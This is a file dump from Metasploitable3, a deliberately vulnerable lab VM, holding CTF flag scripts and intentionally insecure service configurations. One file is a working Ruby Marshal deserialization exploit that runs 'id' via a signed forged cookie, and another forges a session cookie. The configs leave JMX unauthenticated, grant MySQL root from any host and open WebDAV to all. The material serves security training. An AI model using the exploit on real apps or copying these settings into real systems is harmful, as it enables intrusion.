-------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_diamonds/five_of_diamonds: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_diamonds/five_of_diamonds -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_diamonds/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_diamonds/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/5_of_hearts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_hearts/5_of_hearts.png -------------------------------------------------------------------------------- 
/resources/flags/linux_flags/5_of_hearts/extract_metadata.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'chunky_png' 4 | require 'base64' 5 | 6 | img_fname = ARGV.shift 7 | 8 | if img_fname.nil? || img_fname.empty? 9 | puts "[*] Please provide a PNG file" 10 | exit 11 | end 12 | 13 | puts "[*] Extracting 5 of Hearts from #{img_fname}..." 14 | img = ChunkyPNG::Image.from_file(img_fname) 15 | five_of_hearts = Base64::strict_decode64(img.metadata['5_of_hearts']) 16 | File.open('real_5_of_hearts.png', 'wb') { |f| f.write(five_of_hearts) } 17 | 18 | puts "[*] Done." 19 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/fake.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_hearts/fake.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/inject_metadata.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'chunky_png' 4 | require 'base64' 5 | 6 | FAKEPNG = 'fake.png' 7 | SOURCEPNG = 'source.png' 8 | OUTPNG = '5_of_hearts.png' 9 | 10 | puts "[*] Injecting 5 of Hearts data into #{FAKEPNG}..." 
11 | source = File.read(SOURCEPNG) 12 | b64 = Base64.strict_encode64(source) 13 | img = ChunkyPNG::Image.from_file(FAKEPNG) 14 | img.metadata['5_of_hearts'] = b64 15 | img.save(OUTPNG) 16 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/5_of_hearts/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/5_of_hearts/source.png -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/check_sinatra_vuln.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | # 4 | # This will check our vulnerable app to see if it's vulnerable or not. 5 | # It does so by predicting the hash in the cookie. 6 | # 7 | 8 | require 'openssl' 9 | require 'cgi' 10 | require 'net/http' 11 | require 'base64' 12 | 13 | SECRET = "a7aebc287bba0ee4e64f947415a94e5f" 14 | 15 | cli = Net::HTTP.new('172.28.128.3', 8181) 16 | req = Net::HTTP::Get.new('/') 17 | res = cli.request(req) 18 | cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || '' 19 | data, hash = cookie.split('--') 20 | obj = Marshal.load(Base64.decode64(CGI.unescape(data))) 21 | puts "[*] Found data: #{obj}" 22 | puts "[*] Found hash: #{hash}" 23 | puts "[*] Attempting to recreate the same hash with secret: #{SECRET}" 24 | expected_hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, CGI.unescape(data)) 25 | puts "[*] Predicted hash: #{expected_hash}" 26 | 27 | if expected_hash == hash 28 | puts "[*] Yay! we can predict the hash. The server is vulnerable." 
29 | end 30 | -------------------------------------------------------------------------------- /resources/flags/linux_flags/6_of_clubs/get_flag.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # 4 | # This PoC will inject Ruby code in our vulnerable app. 5 | # It will run the system command "id", and save the output in /tmp/your_id.txt 6 | # 7 | 8 | require 'openssl' 9 | require 'cgi' 10 | require 'net/http' 11 | require 'base64' 12 | require 'digest' 13 | 14 | SECRET = "a7aebc287bba0ee4e64f947415a94e5f" 15 | 16 | http = Net::HTTP.new('172.28.128.3', 8181) 17 | req = Net::HTTP::Get.new('/') 18 | res = http.request(req) 19 | cookie = res['Set-Cookie'].scan(/_metasploitable=(.+); path/).flatten.first || '' 20 | data, hash = cookie.split('--') 21 | obj = Marshal.load(Base64.decode64(CGI.unescape(data))) 22 | sid = obj['session_id'] 23 | puts "[*] Obtained session ID: #{sid}" 24 | 25 | puts "[*] Using stolen SECRET: #{SECRET}" 26 | puts "[*] Modifying _metasploitable cookie to 'six of clubs'" 27 | data = { 'session_id' => sid, '_metasploitable' => "six of clubs" } 28 | dump = [ Marshal.dump(data) ].pack('m') 29 | hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump) 30 | cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}" 31 | 32 | req = Net::HTTP::Get.new('/flag') 33 | req['Cookie'] = cookie 34 | res = http.request(req) 35 | 36 | File.open('6_of_clubs.png', 'wb') { |f| f.write(res.body) } 37 | md5 = Digest::MD5.hexdigest(res.body) 38 | puts "[*] 6_of_clubs.png downloaded." 39 | puts "[*] 6 of Clubs MD5: #{md5}" 40 | 41 | =begin 42 | $ ruby get_flag.rb 43 | [*] Obtained session ID: e3d1958384f27cc5f16424f060c480ff28048ebd4bff3f338d00f045ff308752 44 | [*] Using stolen SECRET: a7aebc287bba0ee4e64f947415a94e5f 45 | [*] Modifying _metasploitable cookie to 'six of clubs' 46 | [*] 6_of_clubs.png downloaded. 
47 | [*] 6 of Clubs MD5: d9247a49d132a4f92dcc813f63eb1c8b
48 | =end
49 |
--------------------------------------------------------------------------------
/resources/flags/linux_flags/6_of_clubs/poc.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 |
3 | #
4 | # This PoC will inject Ruby code in our vulnerable app.
5 | # It will run the system command "id", and save the output in /tmp/your_id.txt
6 | # Precondition: SECRET is the app's cookie-signing key; presumably the app Marshal-loads the signed cookie (server source is not shown here).
7 | # Mitigation: a secret generated per deployment and kept out of the repo, plus a cookie serializer such as JSON that cannot instantiate objects.
8 | require 'openssl'
9 | require 'cgi'
10 | require 'net/http'
11 | # Hard-coded signing key, the same value used by the other 6_of_clubs scripts.
12 | SECRET = "a7aebc287bba0ee4e64f947415a94e5f"
13 | # Empty stand-in classes: no real Erubis or ActiveSupport code is loaded here, only the class names end up in the dump.
14 | module Erubis;class Eruby;end;end
15 | module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end
16 | # allocate skips initialize; the instance variables are then set directly.
17 | erubis = Erubis::Eruby.allocate
18 | erubis.instance_variable_set :@src, "%x(id > /tmp/your_id.txt); 1"
19 | proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.allocate
20 | proxy.instance_variable_set :@instance, erubis
21 | proxy.instance_variable_set :@method, :result
22 | proxy.instance_variable_set :@var, "@result"
23 |
24 | session = { 'session_id' => '', 'exploit' => proxy }
25 | # Same cookie layout as get_flag.rb: base64 Marshal dump, "--", HMAC-SHA1 hex, all URL-escaped.
26 | dump = [ Marshal.dump(session) ].pack('m')
27 | hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, SECRET, dump)
28 | cookie = "_metasploitable=#{CGI.escape("#{dump}--#{hmac}")}"
29 | # Sent to 127.0.0.1, so presumably meant to be run on the lab VM itself; the response is not inspected.
30 | http = Net::HTTP.new('127.0.0.1', 8181)
31 | req = Net::HTTP::Get.new('/')
32 | req['Cookie'] = cookie
33 | res = http.request(req)
34 | puts "Done"
35 |
--------------------------------------------------------------------------------
/resources/flags/linux_flags/6_of_clubs/server:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/6_of_clubs/server
--------------------------------------------------------------------------------
/resources/flags/linux_flags/6_of_clubs/source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/6_of_clubs/source.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/6_of_clubs/start.cr:
--------------------------------------------------------------------------------
1 | # Crystal version: 0.22.0
2 | require "Digest/MD5"
3 | # Crystal version 0.23.1
4 | # require "digest/md5"
5 | # Launcher: runs bundle install in /opt/sinatra, picks a salt, then has ruby decode the .server file with it and eval the result.
6 | Process.run("cd /opt/sinatra && bundle install", shell: true)
7 | yum_yum = "s" + "i" + "n" + "a" + "t" + "r" + "a"  # "sinatra"
8 | yuck_yuck = "b" + "a" + "n" + "a" + "n" + "a"  # "banana"
9 | var_code = "c" + "r"  # "cr"
10 | var_obf = "o" + "b" + "f" + "u" + "s" + "c" + "a" + "t" + "e"  # "obfuscate"
11 | var_server = "." + "s" + "e" + "r" + "v" + "e"+ "r"  # ".server"
12 | var_passwd = "/" + "e" + "t" + "c" + "/" + "p" + "a" + "s" + "s" + "w" + "d"  # "/etc/passwd"
13 | var_hash_match = "e" + "4" + "b" + "7" + "c" + "5" + "8" + "f" + "d" + "c" + "7" + "b" + "b" + "a" + "7" + "7" + "2" + "1" + "2" + "4" + "2" + "a" + "7" + "5" + "e" + "d" + "3" + "4" + "1" + "7" + "8" + "7"  # "e4b7c58fdc7bba7721242a75ed341787"
14 | # The MD5 of the first 40 lines of /etc/passwd acts as a fingerprint of the machine this runs on.
15 | passwd_lines = ""
16 | counter = 0
17 |
18 | File.each_line(var_passwd) do |line|
19 |   counter += 1
20 |   if counter <= 40
21 |     passwd_lines += line + "\n"
22 |   end
23 | end
24 |
25 | hash = Digest::MD5.hexdigest(passwd_lines)
26 | # Matching fingerprint selects salt "sinatra", anything else "banana"; presumably only one salt decodes .server into valid Ruby.
27 | if hash == var_hash_match
28 |   code = %{require '#{var_obf}'; Obfuscate.setup { |c| c.salt = '#{yum_yum}'; c.mode = :string }; #{var_code} = Obfuscate.clarify(File.read('#{var_server}')); eval(#{var_code})}
29 | else
30 |   code = %{require '#{var_obf}'; Obfuscate.setup { |c| c.salt = '#{yuck_yuck}'; c.mode = :string }; #{var_code} = Obfuscate.clarify(File.read('#{var_server}')); eval(#{var_code})}
31 | end
32 | # NOTE(review): code is spliced into a double-quoted shell string; every part is a constant here, but the eval means whoever can write /opt/sinatra/.server decides what runs.
33 | Process.run("cd /opt/sinatra && ruby -e \"#{code}\"", shell: true)
34 |
--------------------------------------------------------------------------------
/resources/flags/linux_flags/7_of_diamonds/7_of_diamonds.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/7_of_diamonds/7_of_diamonds.zip
--------------------------------------------------------------------------------
/resources/flags/linux_flags/7_of_diamonds/hint.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/7_of_diamonds/hint.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/7_of_diamonds/source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/7_of_diamonds/source.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/7_of_diamonds/zip_png.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | # Packs source.png into a password-protected zip as 7_of_diamonds.png; the password is the first command-line argument.
3 | # gem install rubyzip
4 | require 'zip'
5 |
6 | SOURCEPNG = 'source.png'
7 | CARDNAME = '7_of_diamonds.png'
8 | ZIP_NAME = '7_of_diamonds.zip'
9 | password = ARGV.shift  # taken from argv, so it can appear in shell history and process listings
10 |
11 | if password.nil? || password.empty?
12 |   puts "[x] Please set a password for the zip file you're trying to create"
13 |   exit  # exits with status 0 even though no zip was written
14 | end
15 | # TraditionalEncrypter is rubyzip's legacy ZipCrypto scheme, weak by modern standards: fine for a CTF flag, not for real secrets.
16 | data = File.read(SOURCEPNG)  # NOTE(review): text-mode read; File.binread would be the safer call for a PNG on Windows
17 | zip = Zip::OutputStream.write_buffer(::StringIO.new(''), Zip::TraditionalEncrypter.new(password)) do |o|
18 |   o.put_next_entry(CARDNAME)
19 |   o.write data
20 | end
21 | # The archive was built in memory; write it out in binary mode.
22 | File.open(ZIP_NAME, 'wb') do |f|
23 |   f.write(zip.string)
24 | end
25 | # Echoes the password to stdout: keep this output out of shared logs.
26 | puts "[*] #{ZIP_NAME} created with password: #{password}"
27 |
--------------------------------------------------------------------------------
/resources/flags/linux_flags/8_of_hearts/8_of_hearts.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/8_of_hearts/8_of_hearts.zip
--------------------------------------------------------------------------------
/resources/flags/linux_flags/8_of_hearts/source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/8_of_hearts/source.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/8_of_hearts/zip_png.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | # Packs source.png into a password-protected zip as 8_of_hearts.png; the password is the first command-line argument.
3 | # gem install rubyzip
4 | require 'zip'
5 |
6 | SOURCEPNG = 'source.png'
7 | CARDNAME = '8_of_hearts.png'
8 | ZIP_NAME = '8_of_hearts.zip'
9 | password = ARGV.shift  # taken from argv, so it can appear in shell history and process listings
10 |
11 | if password.nil? || password.empty?
12 |   puts "[x] Please set a password for the zip file you're trying to create"
13 |   exit  # exits with status 0 even though no zip was written
14 | end
15 | # TraditionalEncrypter is rubyzip's legacy ZipCrypto scheme, weak by modern standards: fine for a CTF flag, not for real secrets.
16 | data = File.read(SOURCEPNG)  # NOTE(review): text-mode read; File.binread would be the safer call for a PNG on Windows
17 | zip = Zip::OutputStream.write_buffer(::StringIO.new(''), Zip::TraditionalEncrypter.new(password)) do |o|
18 |   o.put_next_entry(CARDNAME)
19 |   o.write data
20 | end
21 | # The archive was built in memory; write it out in binary mode.
22 | File.open(ZIP_NAME, 'wb') do |f|
23 |   f.write(zip.string)
24 | end
25 | # Echoes the password to stdout: keep this output out of shared logs.
26 | puts "[*] #{ZIP_NAME} created with password: #{password}"
27 |
--------------------------------------------------------------------------------
/resources/flags/linux_flags/ace_of_clubs/chatbot.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/ace_of_clubs/chatbot.zip
--------------------------------------------------------------------------------
/resources/flags/linux_flags/ace_of_clubs/source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/ace_of_clubs/source.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/joker_flag/convert.rb:
--------------------------------------------------------------------------------
1 | require 'chunky_png'
2 | # Usage: ruby convert.rb SOURCE.png DEST.png. Inverts the RGB of every pixel that is not fully transparent.
3 | include ChunkyPNG::Color
4 | # Reopens ChunkyPNG::Color to add invert(); see the gist below.
5 | # https://gist.github.com/jeffkreeftmeijer/923084
6 | module ChunkyPNG::Color
7 |   def invert(value)
8 |     rgb(MAX - r(value), MAX - g(value), MAX - b(value))  # NOTE(review): no alpha is passed, so partially transparent pixels presumably come out opaque; confirm
9 |   end
10 | end
11 | # NOTE(review): neither argument is checked; a missing one reaches from_file or save as nil.
12 | source = ARGV.shift
13 | dest = ARGV.shift
14 |
15 | # joker-black.png
16 | img = ChunkyPNG::Image.from_file(source)
17 | img.pixels.map! do |p|
18 |   if ChunkyPNG::Color.fully_transparent?(p)
19 |     p
20 |   else
21 |     ChunkyPNG::Color.invert(p)
22 |   end
23 | end
24 |
25 | img.save(dest)
26 |
--------------------------------------------------------------------------------
/resources/flags/linux_flags/joker_flag/joker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/joker_flag/joker.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/joker_flag/md5.txt:
--------------------------------------------------------------------------------
1 | 5c70e13495405b781e6f231d827a565a
2 |
--------------------------------------------------------------------------------
/resources/flags/linux_flags/joker_flag/source.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/joker_flag/source.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/king_of_spades/fake.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/king_of_spades/fake.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/king_of_spades/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/king_of_spades/flag.png
--------------------------------------------------------------------------------
/resources/flags/linux_flags/king_of_spades/king_of_spades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/linux_flags/king_of_spades/king_of_spades.png -------------------------------------------------------------------------------- /resources/flags/seven_of_spades.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/seven_of_spades.pdf -------------------------------------------------------------------------------- /resources/flags/six_of_diamonds.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/six_of_diamonds.zip -------------------------------------------------------------------------------- /resources/flags/ten_of_diamonds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/ten_of_diamonds.png -------------------------------------------------------------------------------- /resources/flags/three_of_spades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/flags/three_of_spades.png -------------------------------------------------------------------------------- /resources/glassfish/admin-keyfile: -------------------------------------------------------------------------------- 1 | admin;{SSHA256}lmXQf85PwyYmoHqS5TpPzBiN9Rse3GlMI2LNJtY9+pswty71AOxo0Q==;asadmin 2 | 
-------------------------------------------------------------------------------- /resources/jenkins/jenkins.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jenkins/jenkins.exe -------------------------------------------------------------------------------- /resources/jenkins/jenkins.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jenkins/jenkins.war -------------------------------------------------------------------------------- /resources/jmx/Hello.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/Hello.class -------------------------------------------------------------------------------- /resources/jmx/HelloMBean.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/HelloMBean.class -------------------------------------------------------------------------------- /resources/jmx/SimpleAgent.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/SimpleAgent.class -------------------------------------------------------------------------------- /resources/jmx/jmx.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/jmx/jmx.exe -------------------------------------------------------------------------------- 
/resources/jmx/start_jmx.bat:
--------------------------------------------------------------------------------
1 | "C:\openjdk6\openjdk-1.6.0-unofficial-b28-windows-amd64-installer\jre\bin\java.exe" -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=1617 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false SimpleAgent
2 | REM JMX remote management listens on port 1617 with authenticate=false and ssl=false, so it is unauthenticated and unencrypted. Lab-only: on a real host enable both and restrict access to the port.
--------------------------------------------------------------------------------
/resources/manageengine/setup.iss:
--------------------------------------------------------------------------------
1 | [InstallShield Silent]
2 | Version=v7.00
3 | File=Response File
4 | [File Transfer]
5 | OverwrittenReadOnly=NoToAll
6 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-DlgOrder]
7 | Dlg0={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdWelcome-0
8 | Count=9
9 | Dlg1={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdLicense-0
10 | Dlg2={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdAskDestPath-0
11 | Dlg3={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-MessageBox-0
12 | Dlg4={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-AskText-0
13 | Dlg5={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdSelectFolder-0
14 | Dlg6={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdStartCopy-0
15 | Dlg7={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdShowMailPanel-20319
16 | Dlg8={BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdFinish-0
17 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdWelcome-0]
18 | Result=1
19 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdLicense-0]
20 | Result=1
21 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdAskDestPath-0]
22 | szDir=C:\ManageEngine
23 | Result=1
24 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-MessageBox-0]
25 | Result=1
26 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-AskText-0]
27 | szText=8020
28 | Result=1
29 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdSelectFolder-0]
30 | szFolder=ManageEngine Desktop Central
31 | Result=1
32 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdStartCopy-0]
33 | Result=1
34 | [Application]
35 | Name=ManageEngine Desktop Central
36 |
Version=9.0.0
37 | Company=ZOHO Corp
38 | Lang=0409
39 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdShowMailPanel-20319]
40 | Result=1
41 | [{BCEF6F6B-E530-4D5E-8DB7-C54F96DB9D2A}-SdFinish-0]
42 | Result=1
43 | bOpt1=0
44 | bOpt2=1
45 |
--------------------------------------------------------------------------------
/resources/mysql/update_mysql_permissions.sql:
--------------------------------------------------------------------------------
1 | GRANT ALL PRIVILEGES ON *.* TO 'root'@'%';
2 | FLUSH PRIVILEGES;
3 | -- Grants every privilege on every database to root from any host ('%'). Lab-only: never apply this to a real server.
--------------------------------------------------------------------------------
/resources/rails_server/Gemfile:
--------------------------------------------------------------------------------
1 | source 'http://rubygems.org'
2 | # NOTE(review): gems are fetched over plain http here and in gemrc, so downloads are not protected in transit; use https outside this lab.
3 | # The version pins below are old, presumably on purpose for this vulnerable lab image; do not copy them into a real project.
4 | # Bundle edge Rails instead: gem 'rails', github: 'rails/rails'
5 | gem 'rails', '4.1.1'
6 | # Use sqlite3 as the database for Active Record
7 | gem 'sqlite3', '1.3.11'
8 | # Use SCSS for stylesheets
9 | gem 'sass-rails', '~> 4.0.3'
10 | # Use Uglifier as compressor for JavaScript assets
11 | gem 'uglifier', '>= 1.3.0'
12 | # Use CoffeeScript for .js.coffee assets and views
13 | gem 'coffee-rails', '~> 4.0.0'
14 | # See https://github.com/sstephenson/execjs#readme for more supported runtimes
15 | # gem 'therubyracer', platforms: :ruby
16 |
17 | # Use jquery as the JavaScript library
18 | gem 'jquery-rails'
19 | # Turbolinks makes following links in your web application faster. Read more: https://github.com/rails/turbolinks
20 | gem 'turbolinks'
21 | # Build JSON APIs with ease. Read more: https://github.com/rails/jbuilder
22 | gem 'jbuilder', '~> 2.0'
23 | # bundle exec rake doc:rails generates the API under doc/api.
24 | gem 'sdoc', '~> 0.4.0', group: :doc
25 |
26 | # Use ActiveModel has_secure_password
27 | # gem 'bcrypt', '~> 3.1.7'
28 |
29 | # Use unicorn as the app server
30 | # gem 'unicorn'
31 |
32 | # Use Capistrano for deployment
33 | # gem 'capistrano-rails', group: :development
34 |
35 | # Use debugger
36 | # gem 'debugger', group: [:development, :test]
37 |
38 | # Windows does not include zoneinfo files, so bundle the tzinfo-data gem
39 | gem 'tzinfo-data', platforms: [:mingw, :mswin, :x64_mingw]
40 | # NOTE(review): web-console is not limited to a development group, so it loads in every environment; presumably intentional for this lab.
41 | gem 'web-console', '~> 2.0', '<2.1.3'
42 |
--------------------------------------------------------------------------------
/resources/rails_server/gemrc:
--------------------------------------------------------------------------------
1 | ---
2 | :backtrace: false
3 | :bulk_threshold: 1000
4 | :sources:
5 | - http://rubygems.org/
6 | :update_sources: true
7 | :verbose: true
8 | # NOTE(review): the only gem source above is plain http; prefer https outside this lab.
--------------------------------------------------------------------------------
/resources/rails_server/start_rails_server.bat:
--------------------------------------------------------------------------------
1 | cd "C:\Program Files\Rails_Server"
2 | C:\tools\ruby23\bin\rails.bat server
3 |
--------------------------------------------------------------------------------
/resources/security_settings/secconfig.cfg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/security_settings/secconfig.cfg
--------------------------------------------------------------------------------
/resources/wamp/phpMyAdmin-3.5.2.2-english.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/wamp/phpMyAdmin-3.5.2.2-english.zip
--------------------------------------------------------------------------------
/resources/wamp/phpmyadmin.conf: -------------------------------------------------------------------------------- 1 | Alias /phpmyadmin "c:/wamp/apps/phpmyadmin3.4.10.1/" 2 | 3 | # to give access to phpmyadmin from outside 4 | # replace the lines 5 | # 6 | # Order Deny,Allow 7 | # Deny from all 8 | # Allow from 127.0.0.1 9 | # 10 | # by 11 | # 12 | # Order Allow,Deny 13 | # Allow from all 14 | # 15 | 16 | 17 | Options Indexes FollowSymLinks MultiViews 18 | AllowOverride all 19 | Order Deny,Allow 20 | Deny from all 21 | Allow from 127.0.0.1 22 | 23 | -------------------------------------------------------------------------------- /resources/wamp/wampserver2.2d-x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/wamp/wampserver2.2d-x64.exe -------------------------------------------------------------------------------- /resources/webdav/httpd-dav.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Distributed authoring and versioning (WebDAV) 3 | # 4 | # Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias 5 | # mod_auth_digest, mod_authn_file 6 | # 7 | 8 | # The following example gives DAV write access to a directory called 9 | # "uploads" under the ServerRoot directory. 10 | # 11 | # The User/Group specified in httpd.conf needs to have write permissions 12 | # on the directory where the DavLockDB is placed and on any directory where 13 | # "Dav On" is specified. 
14 | 15 | LoadModule dav_module modules/mod_dav.so 16 | LoadModule dav_fs_module modules/mod_dav_fs.so 17 | LoadModule dav_lock_module modules/mod_dav_lock.so 18 | 19 | DavLockDB "c:/wamp/DavLock" 20 | 21 | Alias /uploads "C:/wamp/www/uploads" 22 | 23 | 24 | AllowOverride All 25 | Dav On 26 | 27 | 28 | Order Allow,Deny 29 | Allow from all 30 | 31 | 32 | 33 | # 34 | # The following directives disable redirects on non-GET requests for 35 | # a directory that does not include the trailing slash. This fixes a 36 | # problem with several clients that do not appropriately handle 37 | # redirects for folders with DAV methods. 38 | # 39 | BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully 40 | BrowserMatch "MS FrontPage" redirect-carefully 41 | BrowserMatch "^WebDrive" redirect-carefully 42 | BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully 43 | BrowserMatch "^gnome-vfs/1.0" redirect-carefully 44 | BrowserMatch "^XML Spy" redirect-carefully 45 | BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully 46 | -------------------------------------------------------------------------------- /resources/windows_pre_downloads/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/resources/windows_pre_downloads/.gitkeep -------------------------------------------------------------------------------- /resources/wordpress/wordpress.zip: -------------------------------------------------------------------------------- 